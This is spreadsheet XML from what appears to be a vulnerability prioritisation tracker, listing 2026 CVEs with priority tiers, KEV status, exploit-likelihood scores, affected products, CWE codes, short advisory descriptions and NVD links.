      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce and magento</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S1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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16"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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H17" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H18" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr"/>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T19"/>
  <conditionalFormatting sqref="E2:E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08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2026-09-12</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60004</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Go:gitea.dev</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.27.1</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr"/>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44756</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S7"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T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12645</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12646</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12647</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12650</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
